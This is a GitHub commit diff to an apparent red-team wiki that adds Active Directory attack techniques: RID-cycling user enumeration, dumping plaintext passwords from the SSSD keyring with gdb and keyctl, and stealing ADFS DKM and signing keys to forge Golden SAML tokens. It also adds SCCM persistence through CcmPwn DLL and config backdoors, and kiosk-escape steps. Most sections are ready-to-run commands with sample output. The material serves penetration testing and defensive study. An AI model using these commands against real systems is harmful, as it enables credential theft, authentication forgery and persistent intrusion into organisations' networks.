RID Cycling + SSSD keyring + SCCM persistence + Mkdocs config update

swisskyrepo · Apr 22, 2024 · 35c34b8 · 35c34b8
1 parent a7391cc
commit 35c34b8
Show file tree

Hide file tree

Showing 8 changed files with 276 additions and 42 deletions.
diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md
@@ -303,6 +303,27 @@ You can remotely query every machines on the network to get a list of the users'
   ```
 
 
+## RID cycling
+
+Enumerate users from the Domain Controllers.
+
+* Using `netexec`
+  ```ps1
+  netexec smb 10.10.11.231 -u guest -p '' --rid-brute
+  SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
+  SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
+  SMB         10.10.11.231    445    DC01             498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
+  SMB         10.10.11.231    445    DC01             500: rebound\Administrator (SidTypeUser)
+  SMB         10.10.11.231    445    DC01             501: rebound\Guest (SidTypeUser)
+  SMB         10.10.11.231    445    DC01             502: rebound\krbtgt (SidTypeUser)
+  ```
+
+* Using Impacket script [lookupsid.py](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
+  ```ps1
+  lookupsid.py -no-pass 'guest@rebound.htb' 20000
+  ```
+
+
 ## Other Interesting Commands
 
 - **Find Domain Controllers**

diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md
@@ -40,7 +40,7 @@ make CONF=Release
 
 ## CCACHE ticket reuse from SSSD KCM
 
-SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. 
+System Security Services Daemon (SSSD) maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. 
 The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. 
 By default, the key is only readable if you have **root** permissions.
 
@@ -130,7 +130,53 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_
 ```
 
 
+## Extract accounts from SSSD keyring
+
+**Requirements**:
+
+* `krb5_store_password_if_offline = True` in `/etc/sssd/sssd.conf`
+
+**Exploit**:
+
+When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext.
+
+```ps1
+[domain/domain.local]
+cache_credentials = True
+ipa_domain = domain.local
+id_provider = ipa
+auth_provider = ipa
+access_provider = ipa
+chpass_provider = ipa
+ipa_server = _srv_, server.domain.local
+krb5_store_password_if_offline = true
+```
+
+
+Grab the PID of the SSSD process and hook it in `gdb`. Then list the process keyrings.
+
+```ps1
+gdb -p <PID_OF_SSSD>
+call system("keyctl show > /tmp/output")
+```
+
+From the `/tmp/output` locate the `key_id` for the user you want.
+
+```ps1
+Session Keyring
+ 237034099 --alswrv      0     0  keyring: _ses
+ 689325199 --alswrv      0     0   \_ user: user@domain.local
+```
+
+Back to GDB: 
+
+```ps1
+call system("keyctl print 689325199 > /tmp/output")
+```
+
+
 ## References
 
 * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
-* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
+* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
+* [20.4. Caching Kerberos Passwords - Red Hat Customer Portal](https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/identity_management_guide/kerberos-pwd-cache)
diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md
@@ -1,22 +1,53 @@
 # Active Directory - Federation Services
 
+Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.
+
+
+## ADFS - DKM Master Key
+
+* The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object.
+
+```ps1
+$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto
+[System.BitConverter]::ToString($key)
+```
+
+
+## ADFS - Trust Relationship
+
+Gets the relying party trusts of the Federation Service. 
+
+* Search for `IssuanceAuthorizationRules`
+    ```ps1
+    Get-AdfsRelyingPartyTrust
+    ```
+
+
 ## ADFS - Golden SAML
 
+Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system. 
+
+* Golden SAML are effective even when 2FA is enabled. 
+* The token-signing private key is not renewed automatically
+* Changing a user’s password won't affect the generated SAML
+
+
 **Requirements**:
 
 * ADFS service account
 * The private key (PFX with the decryption password)
 
 **Exploitation**:
 
-* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
+* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
 * Convert PFX and Private Key to binary format
     ```ps1
     # For the pfx
     echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
     # For the private key
     echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin 
     ```
+
 * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof).
     ```ps1
     mkdir ADFSpoofTools
@@ -36,11 +67,64 @@
     /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
     ```
 
+
+**Manual Exploitation**: 
+
+* Retrieve the WID path: `Get-AdfsProperties`
+* Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust`
+* Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin`
+    ```powershell
+    $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings"
+    $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString);
+    $client.Open();
+    $cmd = $client.CreateCommand()
+    $cmd.CommandText = "SELECT name FROM sys.databases"
+    $reader = $cmd.ExecuteReader()
+    $reader.Read() | Out-Null
+    $name = $reader.GetString(0)
+    $reader.Close()
+    Write-Output $name;
+    ```
+* Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory: 
+    ```ps1
+    ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto
+    ```
+* Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key`
+* Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML
+
+NOTE: There might be multiple master keys in the container, remember to try them all.
+
+
+**Golden SAML Examples**
+
+* SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions` 
+    ```ps1
+    python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls
+    /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
+    ```
+
+* Office365: requires `--upn` and `--objectguid`
+    ```ps1
+    python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1
+    ```
+
+* Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format.
+
+**NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server.
+
+
 Other interesting tools to exploit AD FS: 
 
 * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction.
-
+* [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack
+    ```ps1
+    python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED
+    ```
 
 ## References
 
-* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
+* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
+* [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html)
+* [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)
+* [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+* [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)
diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md
@@ -1,12 +1,11 @@
 # Deployment - SCCM
 
-## Application Deployment
+## SCCM Application Deployment
 
 > SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
 
-* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
-* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
-
+* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
+* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
 
 * Using **SharpSCCM**
   ```ps1
@@ -75,7 +74,10 @@
   ```
 
 
-## Configuration Manager
+## SCCM Configuration Manager
+
+* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1)
+
 
 ### CRED-1 Retrieve credentials via PXE boot media
 
@@ -214,6 +216,25 @@ From a remote machine.
     ```
 
 
+## SCCM Persistence
+
+* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
+
+CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
+
+* Backdoor the `SCNotification.exe.config` to load your DLL
+
+    ```ps1
+    python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
+    ```
+
+* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share
+
+    ```ps1
+    python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10
+    ```
+
+
 ## References
 
 * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
@@ -222,4 +243,9 @@ From a remote machine.
 * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
 * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
 * [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
-* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
+* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
+* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en)
+* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/)
+* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/)
+* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/)
+* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/)
diff --git a/docs/cheatsheets/escape-breakout.md b/docs/cheatsheets/escape-breakout.md
@@ -1,7 +1,8 @@
-# Application Escape and Breakout
+# Kiosk Escape and Jail Breakout
 
 ## Summary
 
+* [Methodology](#methodology)
 * [Gaining a command shell](#gaining-a-command-shell)
 * [Sticky Keys](#sticky-keys)
 * [Dialog Boxes](#dialog-boxes)
@@ -21,6 +22,19 @@
 * [kiosk.vsim.xyz](https://kiosk.vsim.xyz/) - tooling for browser-based, Kiosk mode testing.
 
 
+## Methodology
+
+- Display global variables and their permissions: `export -p`
+- Switch to another user using `sudo`/`su`
+- Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at [Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) / [Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)
+- List default commands in the restricted shell: `compgen -c`
+- Container escape if it's running inside a `Docker`/`LXC` container
+- Pivot onto the network
+    - Scan other machines on the network or attempt SSRF exploitation
+    - Metadata for Cloud assets, see `cloud/aws` and `cloud/azure`
+- Use globbing capability built inside the shell: `echo *`, `echo .*`, `echo /*`
+
+
 ## Gaining a command shell
 
 * **Shortcut**
@@ -106,6 +120,7 @@ Enter *.* or *.exe or similar in `File name` box
 * Print menus
 * All other menus that provide dialog boxes
 
+
 ### Accessing filesystem
 
 Enter these paths in the address bar:
@@ -115,6 +130,7 @@ Enter these paths in the address bar:
 * %HOMEDRIVE%
 * \\127.0.0.1\c$\Windows\System32
 
+
 ### Unassociated Protocols
 
 It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. 
@@ -143,6 +159,14 @@ firefox irc://127.0.0.1 -P "Test"
 
 ## Shell URI Handlers
 
+A URI (Uniform Resource Identifier) handler is a software component that enables a web browser or operating system to pass a URI to an appropriate application for further handling. 
+
+For example, when you click on a "mailto:" link in a webpage, your device knows to open your default email application. This is because the "mailto:" URI scheme is registered to be handled by an email application. Similarly, "http:" and "https:" URIs are typically handled by a web browser.
+
+In essence, URI handlers provide a bridge between web content and desktop applications, allowing for a seamless user experience when navigating between different types of resources.
+
+The following URI handlers might trigger application on the machine: 
+
 * shell:DocumentsLibrary
 * shell:Librariesshell:UserProfiles
 * shell:Personal